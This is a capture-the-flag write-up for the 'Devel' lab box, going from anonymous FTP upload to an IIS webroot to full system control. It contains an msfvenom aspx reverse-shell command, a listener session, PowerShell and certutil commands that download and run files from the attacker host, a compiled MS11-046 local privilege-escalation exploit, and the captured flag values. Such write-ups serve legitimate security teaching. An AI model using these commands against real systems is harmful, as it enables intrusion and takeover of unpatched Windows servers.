This is an easy windows box
Tools used
- certutil
- ftp
- i686-w64-mingw32-gcc
- msfvenom
- nc
- nmap
- powershell
- python
- smbserver
- wget
- winPEAS
Reconnaissance
Nmap
nmap -sC -sV -oA devel 10.10.10.5 -v
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Here’s what nmap teaches us :
- port 21 (FTP) - with anonyous login and 2 files / 1 directorie
- port 80 (HTTP) - IIS 7.5
First I go to the website :
This is a default IIS7 installation. Looking at the image, I see that it’s called “welcome.png”, the same name as the one on the FTP, weird. Let’s see what I can do with the FTP.
ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:liodeus): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp>
To login I used the following credentials “anonymous:Anything” and I have the right to list files/directories, nice, can I write also ?
First I created a html test file :
echo "<h1>test</h1>" > test.html
Then over the ftp I used the command “put
ftp> put test.html
local: test.html remote: test.html
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
15 bytes sent in 0.00 secs (36.6211 kB/s)
It seems to work ! Let’s go see if I can view it.
I can upload files as I want, nice ! So now let’s upload a reverse shell !
Exploit
For a reverse shell I used msfvenom and “aspx” extension because it’s IIS.
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=1234 -f aspx > shell.aspx
Upload the reverse shell :
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2746 bytes sent in 0.00 secs (6.9280 MB/s)
Start the nc listener :
nc -lvp 1234
Then go see the page where the shell is upload :
curl http://10.10.10.5/shell.aspx
And I have a connection :
nc -lvp 1234
listening on [any] 1234 ...
10.10.10.5: inverse host lookup failed: Unknown host
connect to [10.10.14.4] from (UNKNOWN) [10.10.10.5] 49164
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
I’m not “nt authority\system” (root on windows), I have the same rights as the web server, let’s escalate !
Let’s do some Windows reconnaissance, for that I used something called “winPEAS” https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS. So let’s upload it to the box :
I’ll show different methods to upload a file :
Start a HTTP server with python :
python -m SimpleHTTPServer
Then download the file using powershell :
powershell iex (New-Object Net.WebClient).DownloadString("http://10.10.14.4:8000/winPEAS.bat")
Or with certutil.exe
certutil.exe -urlcache -split -f http://10.10.14.4:8000/winPEAS.bat
You can do it with smbserver from impacket :
sudo smbserver.py liodeus ./
[sudo] password for liodeus:
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Then copy the file that you need :
c:\Windows\Temp>copy \\10.10.14.4\liodeus\winPEAS.bat .
copy \\10.10.14.4\liodeus\winPEASany.exe .
1 file(s) copied.
The file is upload, now run it :
winPEAS.bat
It will run and output a lot of informations. What i’m interresting in is this part :
[i] Check for vulnerabilities for the OS version with the applied patches
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#kernel-exploits
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 25/7/2020, 1:08:14 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 746 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.533 MB
Virtual Memory: In Use: 514 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
No Instance(s) Available.
"Microsoft Windows 7 Enterprise "
[i] Possible exploits (https://github.com/codingo/OSCP-2/blob/master/Windows/WinPrivCheck.bat)
No Instance(s) Available.
MS11-080 patch is NOT installed! (Vulns: XP/SP3,2K3/SP3-afd.sys)
No Instance(s) Available.
MS16-032 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-secondary logon)
No Instance(s) Available.
MS11-011 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP1/2,7/SP0-WmiTraceMessageVa)
No Instance(s) Available.
MS10-59 patch is NOT installed! (Vulns: 2K8,Vista,7/SP0-Chimichurri)
No Instance(s) Available.
MS10-21 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2/3,2K3/SP2,2K8/SP2,Vista/SP0/1/2,7/SP0-Win Kernel)
No Instance(s) Available.
MS10-092 patch is NOT installed! (Vulns: 2K8/SP0/1/2,Vista/SP1/2,7/SP0-Task Sched)
No Instance(s) Available.
MS10-073 patch is NOT installed! (Vulns: XP/SP2/3,2K3/SP2/2K8/SP2,Vista/SP1/2,7/SP0-Keyboard Layout)
No Instance(s) Available.
MS17-017 patch is NOT installed! (Vulns: 2K8/SP2,Vista/SP2,7/SP1-Registry Hive Loading)
No Instance(s) Available.
MS10-015 patch is NOT installed! (Vulns: 2K,XP,2K3,2K8,Vista,7-User Mode to Ring)
No Instance(s) Available.
MS08-025 patch is NOT installed! (Vulns: 2K/SP4,XP/SP2,2K3/SP1/2,2K8/SP0,Vista/SP0/1-win32k.sys)
No Instance(s) Available.
MS06-049 patch is NOT installed! (Vulns: 2K/SP4-ZwQuerySysInfo)
No Instance(s) Available.
MS06-030 patch is NOT installed! (Vulns: 2K,XP/SP2-Mrxsmb.sys)
No Instance(s) Available.
MS05-055 patch is NOT installed! (Vulns: 2K/SP4-APC Data-Free)
No Instance(s) Available.
MS05-018 patch is NOT installed! (Vulns: 2K/SP3/4,XP/SP1/2-CSRSS)
No Instance(s) Available.
MS04-019 patch is NOT installed! (Vulns: 2K/SP2/3/4-Utility Manager)
No Instance(s) Available.
MS04-011 patch is NOT installed! (Vulns: 2K/SP2/3/4,XP/SP0/1-LSASS service BoF)
No Instance(s) Available.
MS04-020 patch is NOT installed! (Vulns: 2K/SP4-POSIX)
No Instance(s) Available.
MS14-040 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-afd.sys Dangling Pointer)
No Instance(s) Available.
MS16-016 patch is NOT installed! (Vulns: 2K8/SP1/2,Vista/SP2,7/SP1-WebDAV to Address)
No Instance(s) Available.
MS15-051 patch is NOT installed! (Vulns: 2K3/SP2,2K8/SP2,Vista/SP2,7/SP1-win32k.sys)
No Instance(s) Available.
MS14-070 patch is NOT installed! (Vulns: 2K3/SP2-TCP/IP)
No Instance(s) Available.
MS13-005 patch is NOT installed! (Vulns: Vista,7,8,2008,2008R2,2012,RT-hwnd_broadcast)
No Instance(s) Available.
MS13-053 patch is NOT installed! (Vulns: 7SP0/SP1_x86-schlamperei)
No Instance(s) Available.
MS13-081 patch is NOT installed! (Vulns: 7SP0/SP1_x86-track_popup_menu)
This parts tells me :
- OS version : 6.1.7600 N/A Build 7600
- If patches are install - Hotfix(s): N/A
- And wich vulnerable Patch I should test
Searching for exploit with google I typed : “6.1.7600 N/A Build 7600 exploit” and the first link is this one https://www.exploit-db.com/exploits/40564.
It’s working on Windows 7 and there is an explanation on how to compile it :
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the invoking shell/process
# Exploit compiling (Kali GNU/Linux Rolling 64-bit):
# - # i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32
# Exploit prerequisites:
# - low privilege access to the target OS
# - target OS not patched (KB2503665, or any other related
# patch, if applicable, not installed - check "Related security
# vulnerabilities/patches")
# Exploit test notes:
# - let the target OS boot properly (if applicable)
# - Windows 7 (SP0 and SP1) will BSOD on shutdown/reset
So I download it :
wget https://www.exploit-db.com/raw/40564 -o exploit.c
Then compile it as the notes say :
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
And I get the file “exploit.exe”, just need to upload it on the box, so as before, I choose one of the method that I show earlier :
python -m SimpleHTTPServer
certutil.exe -urlcache -split -f http://10.10.14.4:8000/exploit.exe
Then I run it :
c:\Windows\Temp>exploit.exe
exploit.exe
c:\Windows\System32>whoami
whoami
nt authority\system
And voila I’m nt authority\system !
During my research, I found this two github repository, which contains pre-compile exploit for windows :
Now let’s read the flags !
Flags
User.txt
type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
Root.txt
type root.txt.txt
e621a0b5041708797c4fc4728bc72b4b